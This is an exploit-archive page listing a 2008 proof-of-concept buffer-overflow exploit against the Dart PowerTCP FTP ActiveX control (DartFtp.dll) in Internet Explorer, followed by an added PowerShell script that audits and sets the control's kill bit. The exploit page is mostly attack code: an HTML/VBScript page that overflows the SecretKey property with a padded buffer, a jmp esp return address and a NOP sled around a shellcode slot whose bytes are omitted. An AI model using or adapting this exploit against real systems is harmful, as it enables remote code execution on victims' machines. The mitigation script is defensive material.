Details : ExploitAlert

  Topic : Dart Communications PowerTCP FTP module Remote BOF Exploit
  ExploitAlert : 4956
  Milw0rm ID : 6793
  Credit : Intel
  Date : 21.10.2008

  Exploit Code :  

<html>
<pre>
Author: Intel
Discovered by: Intel

Software: PowerTCP ActiveX
Vulnerable Component: DartFtp.dll
Version: 2.0.2.0
Website: www.dart.com
Description:

"PowerTCP tools from Dart Communications are comprehensive tools you can
include in your programs to perform common TCP/IP functions, including FTP,
HTTP, SMTP, POP3, telnet, and SNMP. In addition, Dart supplies a series of
other tools, such as a Zip compressor and a VT320 terminal emulator. This
review, however, will focus only on two tools: the FTP Tool and the Mail
Tool, which supports SMTP and POP3."

RegKey Safe for Script: False
RegKey Safe for Init: True
KillBitSet: False

Tested on Vista SP1 fully patched and IE7


<object classid='clsid:39FDA070-61BA-11D2-AD84-00105A17B608'
id='pwn'></object>
<input language=VBScript onclick=Launch() type=button value="Launch
Exploit">
<script language = 'vbscript'>
Sub Launch

buff = String (1684, "A")
RET = unescape("%5F%DC%02%10%cc") //jmp esp in DartFtp.DLL, we added in int3 because without it our nop sled would cause an access violation
nop = String(22, unescape("%90"))


//Exec Calc Scode
shellcode = "" ' [encoded payload bytes omitted]


naughtybuffer = buff + ret + nop + shellcode + nop

pwn.SecretKey = naughtybuffer

End Sub
</script>
</html>
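
The listing reports "KillBitSet: False" and "Safe for Init: True" for this control. The following PowerShell is an added example, not part of the original listing or of Dart's software: it audits those settings for the CLSID shown above and can set the kill bit. It assumes the standard Internet Explorer registry locations and an elevated prompt; the function names are hypothetical.

```powershell
# Added example: audit and mitigate the ActiveX exposure reported in the listing.
# The CLSID comes from the page; the registry paths are the standard Internet
# Explorer ActiveX locations (assumed unchanged on the target host).
$Clsid      = '{39FDA070-61BA-11D2-AD84-00105A17B608}'
$KillBit    = 0x400   # "Compatibility Flags" bit that stops IE instantiating the control
$SafeScript = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForScripting
$SafeInit   = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'   # CATID_SafeForInitializing
# Check both the native and the 32-bit (Wow6432Node) registry views.
$Roots = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\Wow6432Node'

function Get-ActiveXExposure {
    foreach ($root in $Roots) {
        $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        $cats   = "$root\Classes\CLSID\$Clsid\Implemented Categories"
        $flags  = 0
        if (Test-Path $compat) {
            $prop = Get-ItemProperty -Path $compat -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
            if ($prop) { $flags = [int]$prop.'Compatibility Flags' }
        }
        [pscustomobject]@{
            Hive          = $root
            Registered    = Test-Path "$root\Classes\CLSID\$Clsid"
            SafeForScript = Test-Path "$cats\$SafeScript"
            SafeForInit   = Test-Path "$cats\$SafeInit"
            KillBitSet    = ($flags -band $KillBit) -ne 0
        }
    }
}

function Set-ActiveXKillBit {
    foreach ($root in $Roots) {
        # Skip a registry view that does not exist (e.g. Wow6432Node on 32-bit Windows).
        if (-not (Test-Path "$root\Microsoft\Internet Explorer")) { continue }
        $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        if (-not (Test-Path $compat)) { New-Item -Path $compat -Force | Out-Null }
        $old = (Get-ItemProperty -Path $compat -ErrorAction SilentlyContinue).'Compatibility Flags'
        # Preserve any flags already present and OR in the kill bit.
        $new = ([int]$old) -bor $KillBit
        Set-ItemProperty -Path $compat -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

Get-ActiveXExposure | Format-Table -AutoSize
# Set-ActiveXKillBit   # uncomment to block the control in IE, then re-run the audit
```

A control can also declare itself safe through the IObjectSafety interface rather than the registry categories, so a `False` in the SafeFor columns does not by itself mean the control is unreachable from a web page; the kill bit is the setting that blocks instantiation in Internet Explorer.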


